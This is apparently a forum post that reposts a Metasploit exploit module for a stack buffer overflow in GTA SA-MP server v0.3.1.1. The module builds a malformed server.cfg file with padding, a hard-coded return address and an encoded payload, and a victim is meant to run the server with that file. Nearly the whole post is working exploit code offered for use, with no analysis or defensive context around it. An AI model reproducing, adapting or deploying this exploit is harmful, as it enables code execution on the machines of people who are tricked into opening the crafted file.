LLegoLLaS Posted October 27, 2011 Report Share Posted October 27, 2011 ### $Id: gta_samp.rb 14076 2011-10-26 22:16:26Z mc $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::FILEFORMATdef initialize(info = {})super(update_info(info,'Name' => 'GTA SA-MP server.cfg Buffer Overflow','Description' => %q{This module exploits a stack-based buffer overflow in GTA SA-MP Server.This buffer overflow occurs when the application attempts to open a malformedserver.cfg file. To exploit this vulnerability, an attacker must send thevictim a server.cfg file and have them run samp-server.exe.},'License' => MSF_LICENSE,'Author' =>['Silent_Dream', # Original discovery, MSF Module, template by mona.py],'Version' => '$Revision: 14076 $','References' =>[[ 'URL', 'http://www.exploit-db.com/exploits/17893' ]],'DefaultOptions' =>{'EXITFUNC' => 'process',},'Platform' => 'win','Payload' =>{'BadChars' => "\x0d\x0a\x1a",'Space' => 392,'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",'DisableNops' => true,'MaxSize' => 392,},'Targets' =>[['GTA SA-MP (samp-server) v0.3.1.1',{'Ret' => 0x00429faa, # PUSH ESP; RET (samp-server.exe)}],],'Privileged' => false,'DisclosureDate' => 'Sep 18 2011','DefaultTarget' => 0))register_options([OptString.new('FILENAME', [ false, 'The file name.', 'server.cfg'])], self.class)enddef exploitbuffer = "echo "buffer << rand_text_alpha_upper(379)buffer << [target.ret].pack('V')buffer << payload.encodedfile_create(buffer)endendsursa Quote Link to comment Share on other sites More sharing options...
